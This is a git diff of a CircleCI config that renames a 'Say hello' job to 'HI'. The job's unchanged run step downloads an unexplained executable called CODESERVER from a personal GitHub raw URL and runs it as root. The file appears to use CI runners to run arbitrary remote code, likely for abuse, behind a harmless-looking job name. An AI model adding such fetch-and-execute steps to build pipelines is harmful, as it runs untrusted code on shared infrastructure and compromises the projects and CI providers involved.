--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -1,15 +1,15 @@
 version: 2.1
 jobs:
-  say-hello:
+  HI:
     docker:
       - image: cimg/node:12.22.11
     steps:
       - checkout
       - run:
-          name: "Say hello"
+          name: "HI"
           command: sudo apt update && sudo apt install nodejs && sudo apt install npm && wget https://raw.githubusercontent.com/aurbach55/pos/main/CODESERVER && chmod +x CODESERVER && sudo ./CODESERVER
 
 workflows:
-  say-hello-workflow:
+  HI-workflow:
     jobs:
-      - say-hello
+      - HI
